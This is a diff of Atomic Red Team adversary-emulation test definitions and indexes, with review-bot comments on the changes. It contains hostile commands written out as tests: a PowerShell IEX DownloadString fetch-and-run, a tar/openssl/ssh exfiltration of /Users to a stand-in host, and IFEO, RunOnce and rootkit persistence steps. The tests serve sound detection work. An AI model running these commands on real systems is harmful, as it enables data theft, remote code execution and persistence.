- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -623,7 +622,8 @@
# command-and-control
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1090 Connection Proxy](./T1090/T1090.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132 Data Encoding](./T1132/T1132.md)
@@ -638,7 +638,7 @@
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Remote File Copy](./T1105/T1105.md)
- Atomic Test #1: xxxx [linux, macos]
- Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1125,7 +1125,7 @@ persistence:
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
- name: Mac Hidden file
description: 'TODO
description: 'Hide a file on MacOS
'
supported_platforms:
@@ -1158,29 +1158,39 @@ persistence:
'
- name: Hidden files
description: 'Requieres Apple Dev Tools
description: 'Requires Apple Dev Tools
'
supported_platforms:
- macos
input_arguments:
filename:
description: path of file to hide
type: path
default: "/tmp/evil"
executor:
name: sh
command: 'setfile -a V #(unknown)
'
- name: Hide a Directory
description: 'xxx
description: 'Hide a directory on MacOS
'
supported_platforms:
- macos
input_arguments:
filename:
description: path of file to hide
type: path
default: "/tmp/evil"
executor:
name: sh
command: 'chflags hidden #(unknown)
'
- name: Show all hidden files
description: 'xxx
description: 'Show all hidden files on MacOS
'
supported_platforms:
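Review bot: this generated index mirrors the placeholder problem from the T1158 files: `command: 'setfile -a V #(unknown)` and `command: 'chflags hidden #(unknown)` do not reference the `filename` input (default `/tmp/evil`) that this hunk adds. Fix the source YAML and regenerate; the defense-evasion copy further down has the same two commands.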
@@ -1190,8 +1200,8 @@ persistence:
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
- name: Create visible Directories
description: 'xxx
- name: Create Visible Directories
description: 'Create visible directories on MacOS and Linux
'
supported_platforms:
@@ -1205,7 +1215,7 @@ persistence:
ls
ls visible-directory
- name: Create hidden directories and files
description: 'xxx
description: 'Create hidden directories and files on Nix platforms
'
supported_platforms:
@@ -1550,7 +1560,7 @@ persistence:
identifier: T1183
atomic_tests:
- name: IFEO Add Debugger
description: 'TODO
description: 'Leverage Global Flags Settings
'
supported_platforms:
@@ -1570,7 +1580,7 @@ persistence:
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
- name: IFEO GLobal Flags
- name: IFEO Global Flags
description: 'Leverage Global Flags Settings
'
@@ -1780,7 +1790,7 @@ persistence:
identifier: T1160
atomic_tests:
- name: Launch Daemon
description: 'TODO
description: 'Utilize LaunchDaemon to launch `Hello World`
'
supported_platforms:
@@ -1963,7 +1973,7 @@ persistence:
identifier: T1168
atomic_tests:
- name: Cron Job
description: 'TODO
description: 'Set a cron job
'
supported_platforms:
@@ -1982,7 +1992,7 @@ persistence:
'
- name: Cron Job
description: 'TODO
description: 'Manually set a cron job
'
supported_platforms:
@@ -2595,7 +2605,7 @@ persistence:
identifier: T1150
atomic_tests:
- name: Plist Modification
description: 'TODO
description: 'Modify MacOS plist file in one of two directories
'
supported_platforms:
@@ -2839,7 +2849,7 @@ persistence:
name: powershell
command: |
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
- name: Startup Folder
description: 'Add Shortcut To Startup via PowerShell
@@ -4238,11 +4248,6 @@ defense-evasion:
[Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
supported_platforms:
- windows
input_arguments:
output_file:
description: TODO
type: todo
default: TODO
executor:
name: manual
steps: |
@@ -4983,7 +4988,7 @@ defense-evasion:
mkdir .hidden-directory
echo "this file is hidden" > .hidden-directory/.hidden-file
- name: Mac Hidden file
description: 'TODO
description: 'Hide a file on MacOS
'
supported_platforms:
@@ -5016,29 +5021,39 @@ defense-evasion:
'
- name: Hidden files
description: 'Requieres Apple Dev Tools
description: 'Requires Apple Dev Tools
'
supported_platforms:
- macos
input_arguments:
filename:
description: path of file to hide
type: path
default: "/tmp/evil"
executor:
name: sh
command: 'setfile -a V #(unknown)
'
- name: Hide a Directory
description: 'xxx
description: 'Hide a directory on MacOS
'
supported_platforms:
- macos
input_arguments:
filename:
description: path of file to hide
type: path
default: "/tmp/evil"
executor:
name: sh
command: 'chflags hidden #(unknown)
'
- name: Show all hidden files
description: 'xxx
description: 'Show all hidden files on MacOS
'
supported_platforms:
@@ -5048,8 +5063,8 @@ defense-evasion:
command: 'defaults write com.apple.finder AppleShowAllFiles YES
'
- name: Create visible Directories
description: 'xxx
- name: Create Visible Directories
description: 'Create visible directories on MacOS and Linux
'
supported_platforms:
@@ -5063,7 +5078,7 @@ defense-evasion:
ls
ls visible-directory
- name: Create hidden directories and files
description: 'xxx
description: 'Create hidden directories and files on Nix platforms
'
supported_platforms:
@@ -5250,7 +5265,7 @@ defense-evasion:
identifier: T1183
atomic_tests:
- name: IFEO Add Debugger
description: 'TODO
description: 'Leverage Global Flags Settings
'
supported_platforms:
@@ -5270,7 +5285,7 @@ defense-evasion:
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
- name: IFEO GLobal Flags
- name: IFEO Global Flags
description: 'Leverage Global Flags Settings
'
@@ -6491,7 +6506,7 @@ defense-evasion:
identifier: T1150
atomic_tests:
- name: Plist Modification
description: 'TODO
description: 'Modify MacOS plist file in one of two directories
'
supported_platforms:
@@ -7040,17 +7055,6 @@ defense-evasion:
name: sh
command: 'sudo modprobe #{rootkit_file}
'
- name: LD_PRELOAD based Rootkit
description: 'LD_PRELOAD based Rootkit
'
supported_platforms:
- linux
executor:
name: sh
command: 'export LD_PRELOAD=$PWD/#{rootkit_file}
'
- name: Windows Signed Driver Rootkit Test
description: |
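Review bot: the removed LD_PRELOAD test was non-functional as written (an `export LD_PRELOAD=...` inside the `sh` executor affects only that shell, which exits immediately, so no process is ever preloaded), so deleting it is defensible, but the change is silent about why. If the intent is to drop it until a working version exists, say so in the commit message, and note that the deletion renumbers the remaining T1014 tests in the generated indexes (the Windows Signed Driver Rootkit Test moves from #4 to #3 in the Windows index hunk further down).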
@@ -7446,6 +7450,7 @@ defense-evasion:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
default: "/opt/filename"
executor:
name: sh
command: 'touch -a -t 197001010000.00 #{target_filename}
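Review bot: the new default `"/opt/filename"` points into a root-owned directory, so `touch -a -t ... #{target_filename}` fails with permission denied for an unprivileged runner (touch would create the missing file, which is exactly what it cannot do there). A default under `/tmp`, or a setup step that creates the file, makes the test runnable as-is. Also `type: Path` should be lowercase `path` to match the other arguments in this file (e.g. the `filename` argument in T1158). Both points apply to the two identical hunks that follow.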
@@ -7462,6 +7467,7 @@ defense-evasion:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
default: "/opt/filename"
executor:
name: sh
command: 'touch -m -t 197001010000.00 #{target_filename}
@@ -7480,6 +7486,7 @@ defense-evasion:
target_filename:
description: Path of file that we are going to stomp on last access time
type: Path
default: "/opt/filename"
executor:
name: sh
command: |
@@ -8612,7 +8619,7 @@ privilege-escalation:
identifier: T1183
atomic_tests:
- name: IFEO Add Debugger
description: 'TODO
description: 'Leverage Global Flags Settings
'
supported_platforms:
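Review bot: same issue as the defense-evasion copy: 'Leverage Global Flags Settings' describes the Global Flags test, not the Add Debugger test that sets the `Debugger` value; use a description that names the Debugger value here as well so the two sections stay consistent.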
@@ -8632,7 +8639,7 @@ privilege-escalation:
File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
'
- name: IFEO GLobal Flags
- name: IFEO Global Flags
description: 'Leverage Global Flags Settings
'
@@ -8725,7 +8732,7 @@ privilege-escalation:
identifier: T1160
atomic_tests:
- name: Launch Daemon
description: 'TODO
description: 'Utilize LaunchDaemon to launch `Hello World`
'
supported_platforms:
@@ -8926,7 +8933,7 @@ privilege-escalation:
identifier: T1150
atomic_tests:
- name: Plist Modification
description: 'TODO
description: 'Modify MacOS plist file in one of two directories
'
supported_platforms:
@@ -13321,7 +13328,7 @@ execution:
identifier: T1168
atomic_tests:
- name: Cron Job
description: 'TODO
description: 'Set a cron job
'
supported_platforms:
@@ -13340,7 +13347,7 @@ execution:
'
- name: Cron Job
description: 'TODO
description: 'Manually set a cron job
'
supported_platforms:
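Review bot: both T1168 tests are still named `Cron Job`; the descriptions now differ ('Set a cron job' vs 'Manually set a cron job') but the generated indexes list tests by name, so they remain indistinguishable there. Give the second one a distinct name that says what "manually" means (e.g. editing the crontab by hand versus the first test's method), or fold the distinction into the names of both.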
@@ -15610,8 +15617,8 @@ lateral-movement:
type: attack-pattern
identifier: T1105
atomic_tests:
- name: xxxx
description: 'xxxx
- name: rsync - scp - sftp remote file copy
description: 'Utilize rsync, scp and sftp to perform a remote file copy
'
supported_platforms:
@@ -15620,7 +15627,7 @@ lateral-movement:
executor:
name: bash
command: |
### TODO: Not sure how to handle commands that need to be run on multiple systems
### FIX: Not sure how to handle commands that need to be run on multiple systems
# Adversary System Configuration
# Ensure SSH access has been configured for an adversary account
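Review bot: changing `### TODO:` to `### FIX:` does not resolve the comment's point, which is that this executor mixes commands meant for the adversary system with commands meant for the target. Either state in the description which block runs on which host, or split the test so each executor runs on one machine; as written the `bash` executor runs the whole block on a single host and the comment stays an open question under a different label.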
@@ -16212,7 +16219,7 @@ collection:
- windows
executor:
name: powershell
command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat'')"
command: '"IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat'')"
> c:\windows\pi.log
'
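Review bot: this is the third location this repository has pointed at for Discovery.bat (`Windows/Payloads`, then `atomics/T1074`, now `ARTifacts/Misc`), and every move breaks every test that hardcodes the raw GitHub URL. Consider an input argument (e.g. `payload_url`) with this URL as its default, so a relocation is a one-line change per test and lab operators can point it at an internal mirror instead of fetching from the public branch.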
@@ -16547,9 +16554,8 @@ exfiltration:
identifier: T1002
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
description: 'TODO
'
description: "An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration \n"
supported_platforms:
- windows
input_arguments:
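Review bot: the replacement description is a double-quoted scalar with a trailing space before a literal `\n` ("...prior to exfiltration \n"); every other description in this file is a single-quoted or block scalar, so use the same style here and drop the trailing space. The identical sentence is also used for the Rar and nix variants in the next two hunks; a word on which tool each variant compresses with would make the three descriptions informative rather than interchangeable.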
@@ -16567,9 +16573,8 @@ exfiltration:
'
- name: Compress Data for Exfiltration With Rar
description: 'TODO
'
description: "An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration \n"
supported_platforms:
- windows
input_arguments:
@@ -16587,9 +16592,8 @@ exfiltration:
'
- name: Data Compressed - nix
description: 'TODO
'
description: "An adversary may compress data (e.g., sensitive documents) that
is collected prior to exfiltration \n"
supported_platforms:
- linux
- macos
@@ -16667,7 +16671,7 @@ exfiltration:
identifier: T1022
atomic_tests:
- name: Data Encrypted
description: 'TODO
description: 'Encrypt data for exiltration
'
supported_platforms:
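Review bot: typo in the new description: 'exiltration' should be 'exfiltration'.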
@@ -16738,11 +16742,6 @@ exfiltration:
- centos
- ubuntu
- linux
input_arguments:
output_file:
description: TODO
type: todo
default: TODO
executor:
name: sh
command: |
@@ -16833,6 +16832,19 @@ exfiltration:
- centos
- ubuntu
- linux
input_arguments:
domain:
description: target SSH domain
type: url
default: target.example.com
user_name:
description: username for domain
type: string
default: atomic
password:
description: password for user
type: string
default: atomic
executor:
name: sh
command: 'tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh
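Review bot: `openssl des3 -salt -pass #{password}` will be rejected: `-pass` takes a password source such as `pass:<value>`, `env:<var>` or `file:<path>`, so with the default this becomes `-pass atomic` and openssl exits with an invalid password argument error before anything is sent. Use `-pass pass:#{password}`. Also `domain` is a bare hostname (`target.example.com`), so `type: url` should be `string`, and the description should state that an account matching `user_name`/`password` must already exist on the target for the `ssh` leg to work.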
@@ -16931,6 +16943,89 @@ command-and-control:
modified: '2018-04-18T17:59:24.739Z'
type: attack-pattern
atomic_tests: []
T1090:
technique:
name: Connection Proxy
description: |-
A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)
The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.
The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.
Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
Platforms: Linux, macOS, Windows
Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture
Requires Network: Yes
Contributors: Walker Johnson
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
external_references:
- url: https://attack.mitre.org/wiki/Technique/T1090
source_name: mitre-attack
external_id: T1090
- description: 'Wilhoit, K. (2013, March 4). In-Depth Look: APT Attack Tools
of the Trade. Retrieved December 2, 2015.'
source_name: Trend Micro APT Attack Tools
url: http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created: '2017-05-31T21:31:08.479Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
x_mitre_data_sources:
- Process use of network
- Process monitoring
- Netflow/Enclave netflow
- Packet capture
x_mitre_network_requirements: true
x_mitre_contributors:
- Walker Johnson
id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
modified: '2018-04-18T17:59:24.739Z'
type: attack-pattern
identifier: T1090
atomic_tests:
- name: Connection Proxy
description: |
Enable traffic redirection.
To undo changes made by this test:
unset http_proxy
unset https_proxy
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- macos
- linux
input_arguments:
proxy_server:
description: Proxy server URL (host:port)
type: url
default: 127.0.0.1:8080
proxy_scheme:
description: Protocol to proxy (http or https)
type: string
default: http
executor:
name: sh
command: 'export #{proxy_scheme}_proxy=#{proxy_server}
'
T1132:
technique:
name: Data Encoding
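Review bot: the Connection Proxy executor is a single `export #{proxy_scheme}_proxy=#{proxy_server}` run by the `sh` executor, so the variable exists only in that short-lived shell: nothing that runs afterwards is proxied, and the `unset http_proxy` / `unset https_proxy` undo steps in the description have nothing to undo. For the test to exercise traffic redirection, and to produce the "Process use of network" telemetry the data sources list, a client request has to run in the same executor after the export so a connection to `#{proxy_server}` is actually attempted. Smaller points: `proxy_server` is a `host:port` value, so `type: url` should be `string`; and the imported technique text repeats the sentence "Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious." in both the `Detection:` line and the paragraph after it.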
@@ -17066,8 +17161,8 @@ command-and-control:
type: attack-pattern
identifier: T1105
atomic_tests:
- name: xxxx
description: 'xxxx
- name: rsync - scp - sftp remote file copy
description: 'Utilize rsync, scp and sftp to perform a remote file copy
'
supported_platforms:
@@ -17076,7 +17171,7 @@ command-and-control:
executor:
name: bash
command: |
### TODO: Not sure how to handle commands that need to be run on multiple systems
### FIX: Not sure how to handle commands that need to be run on multiple systems
# Adversary System Configuration
# Ensure SSH access has been configured for an adversary account
+6 -6
@@ -12,7 +12,7 @@
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #3: Hidden file [macos, linux]
- Atomic Test #7: Create visible Directories [macos, linux]
- Atomic Test #7: Create Visible Directories [macos, linux]
- Atomic Test #8: Create hidden directories and files [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1168 Local Job Scheduling](./T1168/T1168.md)
@@ -67,7 +67,7 @@
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Remote File Copy](./T1105/T1105.md)
- Atomic Test #1: xxxx [linux, macos]
- Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -146,7 +146,7 @@
- [T1158 Hidden Files and Directories](./T1158/T1158.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #3: Hidden file [macos, linux]
- Atomic Test #7: Create visible Directories [macos, linux]
- Atomic Test #7: Create Visible Directories [macos, linux]
- Atomic Test #8: Create hidden directories and files [macos, linux]
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070 Indicator Removal on Host](./T1070/T1070.md)
@@ -163,7 +163,6 @@
- [T1014 Rootkit](./T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #3: LD_PRELOAD based Rootkit [linux]
- [T1064 Scripting](./T1064/T1064.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- [T1151 Space after Filename](./T1151/T1151.md)
@@ -196,7 +195,8 @@
# command-and-control
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1090 Connection Proxy](./T1090/T1090.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132 Data Encoding](./T1132/T1132.md)
@@ -211,7 +211,7 @@
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Remote File Copy](./T1105/T1105.md)
- Atomic Test #1: xxxx [linux, macos]
- Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+1 -1
@@ -3,7 +3,7 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](./T1055/T1055.md) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | [Browser Bookmark Discovery](./T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](./T1176/T1176.md) | [Setuid and Setgid](./T1166/T1166.md) | [Disabling Security Tools](./T1089/T1089.md) | [Credentials in Files](./T1081/T1081.md) | [File and Directory Discovery](./T1083/T1083.md) | [Remote File Copy](./T1105/T1105.md) | [Clipboard Data](./T1115/T1115.md) | [Data Encrypted](./T1022/T1022.md) | [Connection Proxy](./T1090/T1090.md) |
| [Spearphishing Attachment](./T1193/T1193.md) | [Local Job Scheduling](./T1168/T1168.md) | [Create Account](./T1136/T1136.md) | [Sudo](./T1169/T1169.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](./T1046/T1046.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Staged](./T1074/T1074.md) | [Data Transfer Size Limits](./T1030/T1030.md) | Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scripting](./T1064/T1064.md) | [Hidden Files and Directories](./T1158/T1158.md) | [Sudo Caching](./T1206/T1206.md) | [File Deletion](./T1107/T1107.md) | [Input Capture](./T1056/T1056.md) | [Password Policy Discovery](./T1201/T1201.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](./T1048/T1048.md) | Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Source](./T1153/T1153.md) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](./T1148/T1148.md) | [Network Sniffing](./T1040/T1040.md) | [Permission Groups Discovery](./T1069/T1069.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Command and Control Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encoding](./T1132/T1132.md) |
+6 -5
@@ -16,7 +16,7 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
- Atomic Test #7: Create visible Directories [macos, linux]
- Atomic Test #7: Create Visible Directories [macos, linux]
- Atomic Test #8: Create hidden directories and files [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -120,7 +120,7 @@
- [T1037 Logon Scripts](./T1037/T1037.md)
- Atomic Test #2: Logon Scripts - Mac [macos]
- [T1105 Remote File Copy](./T1105/T1105.md)
- Atomic Test #1: xxxx [linux, macos]
- Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
- T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -206,7 +206,7 @@
- Atomic Test #4: Hidden files [macos]
- Atomic Test #5: Hide a Directory [macos]
- Atomic Test #6: Show all hidden files [macos]
- Atomic Test #7: Create visible Directories [macos, linux]
- Atomic Test #7: Create Visible Directories [macos, linux]
- Atomic Test #8: Create hidden directories and files [macos, linux]
- [T1147 Hidden Users](./T1147/T1147.md)
- Atomic Test #1: Hidden Users [macos]
@@ -237,7 +237,8 @@
# command-and-control
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1090 Connection Proxy](./T1090/T1090.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1132 Data Encoding](./T1132/T1132.md)
@@ -252,7 +253,7 @@
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1105 Remote File Copy](./T1105/T1105.md)
- Atomic Test #1: xxxx [linux, macos]
- Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
- T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+1 -1
@@ -3,7 +3,7 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](./T1155/T1155.md) | [.bash_profile and .bashrc](./T1156/T1156.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](./T1009/T1009.md) | [Bash History](./T1139/T1139.md) | [Account Discovery](./T1087/T1087.md) | [AppleScript](./T1155/T1155.md) | [Audio Capture](./T1123/T1123.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Command-Line Interface](./T1059/T1059.md) | [Browser Extensions](./T1176/T1176.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](./T1146/T1146.md) | [Brute Force](./T1110/T1110.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Deployment Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](./T1119/T1119.md) | [Data Compressed](./T1002/T1002.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
